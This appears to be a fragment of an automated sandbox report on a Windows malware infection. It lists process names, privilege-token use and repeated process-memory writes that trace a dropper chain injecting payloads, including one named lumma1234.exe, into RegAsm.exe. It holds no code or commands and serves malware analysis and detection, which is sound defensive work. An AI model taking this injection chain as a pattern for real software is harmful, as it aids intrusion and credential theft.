N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A
N/A N/A C:\Users\Admin\Pictures\OcxPYX4e2zNWsylWKFXgkfzw.exe N/A
N/A N/A C:\Users\Admin\Pictures\OcxPYX4e2zNWsylWKFXgkfzw.exe N/A
N/A N/A C:\Users\Admin\Pictures\OcxPYX4e2zNWsylWKFXgkfzw.exe N/A
N/A N/A C:\Users\Admin\Pictures\OcxPYX4e2zNWsylWKFXgkfzw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A
N/A N/A C:\Users\Admin\Pictures\LCWsTyLJjSkGmliYSN6Wv7fZ.exe N/A
N/A N/A C:\Users\Admin\Pictures\LCWsTyLJjSkGmliYSN6Wv7fZ.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A
N/A N/A C:\Users\Admin\Pictures\LCWsTyLJjSkGmliYSN6Wv7fZ.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\Pictures\OcxPYX4e2zNWsylWKFXgkfzw.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\yOIbMyzv9BOumRZmIr0iYxdp.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\LCWsTyLJjSkGmliYSN6Wv7fZ.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3084 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\ed1a118567f1e5200fc0b4171cb873ec43be8ea212b25e87224769955336aedd.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 3084 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\ed1a118567f1e5200fc0b4171cb873ec43be8ea212b25e87224769955336aedd.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 3084 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\ed1a118567f1e5200fc0b4171cb873ec43be8ea212b25e87224769955336aedd.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 1728 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 1728 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 1728 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 1728 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\1000004002\689e56283d.exe
PID 1728 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\1000004002\689e56283d.exe
PID 1728 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\1000004002\689e56283d.exe
PID 4860 wrote to memory of 1104 N/A C:\Users\Admin\1000004002\689e56283d.exe C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
PID 4860 wrote to memory of 1104 N/A C:\Users\Admin\1000004002\689e56283d.exe C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
PID 4860 wrote to memory of 1104 N/A C:\Users\Admin\1000004002\689e56283d.exe C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
PID 1728 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\1000005001\7a60b7df08.exe
PID 1728 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\1000005001\7a60b7df08.exe
PID 1728 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\1000005001\7a60b7df08.exe
PID 1104 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
PID 1104 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
PID 1104 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
PID 1724 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1724 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1724 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1724 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1724 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1724 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1724 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1724 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1104 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
PID 1104 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
PID 1104 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
PID 4804 wrote to memory of 4044 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
PID 4804 wrote to memory of 4044 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
PID 4804 wrote to memory of 3988 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
PID 4804 wrote to memory of 3988 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
PID 4804 wrote to memory of 3988 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
PID 1104 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
PID 1104 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
PID 1104 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
PID 2160 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2160 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2160 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2160 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2160 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2160 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2160 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2160 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2160 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1104 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Windows\system32\WerFault.exe
PID 1104 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Windows\system32\WerFault.exe
PID 1104 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Windows\system32\WerFault.exe
PID 4628 wrote to memory of 4540 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4628 wrote to memory of 4540 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4628 wrote to memory of 4540 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4628 wrote to memory of 4540 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
